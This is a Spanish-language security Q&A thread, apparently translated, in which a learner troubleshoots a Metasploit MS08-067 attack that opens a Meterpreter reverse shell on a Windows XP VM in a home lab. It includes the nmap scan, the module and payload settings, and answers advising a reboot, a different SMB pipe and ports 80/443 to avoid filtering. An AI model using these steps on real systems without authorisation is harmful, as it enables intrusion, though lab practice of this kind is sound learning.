MS08_067 con Metasploit [cerrado]

4

Estoy aprendiendo a usar Metasploit. Estoy usando VirtualBox para ejecutar una máquina virtual con Kali Linux (192.168.56.101) y otra con Windows XP SP1 (192.168.56.103). Las dos máquinas virtuales pueden hacer ping entre sí y el Firewall de Windows está deshabilitado. Estoy ejecutando Metasploit en Kali Linux y tratando de atacar Windows XP SP1.

Arranco msfconsole y comienzo con un escaneo de puerto:

nmap -sT -A --script=smb-check-vulns -Pn --script-args=unsafe=1 192.168.56.103

lo que me dice

Host script results:
| smb-check-vulns: 
|   MS08-067: VULNERABLE

Yo establezco los parámetros de esta manera:

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.103   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.56.101   yes       The listen address
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Windows XP SP0/SP1 Universal

Entonces:

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.101:8080 
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

No active sessions.

¿Qué estoy haciendo mal?

edit: hice lo mismo con Windows XP SP3 VM y funcionó! Realmente no entiendo por qué no funciona con Windows XP SP1 ...

    
pregunta Kiuhnm 29.12.2014 - 21:39
fuente

2 respuestas

1

Parece que tu hazaña no tiene éxito. Puede probar diferente carga útil o cambiar LPORT. A veces, los puertos pueden estar bloqueados por el firewall y no se obtiene una shell inversa. Y una vez que su exploit tenga éxito, obtendrá una shell inversa de inmediato, sin necesidad de escribir el comando "session -l".

    
respondido por el Yang Yu 29.12.2014 - 23:30
fuente
1

Solo un par de cosas:

Es posible que nmap haya bloqueado el servicio original. El parámetro unsafe = 1 para el script NSE le da permiso para bloquearse si es necesario. Asegúrese de que la caja se reinicie entre nmap y la explotación para la mejor oportunidad de éxito. También puede querer: * Explota el SRVSVC en lugar del BROWSER. * establezca el LPORT en 80 (o 443) ya que es menos probable que estos puertos se filtren.

    
respondido por el stiabhan 30.12.2014 - 05:37
fuente

Lea otras preguntas en las etiquetas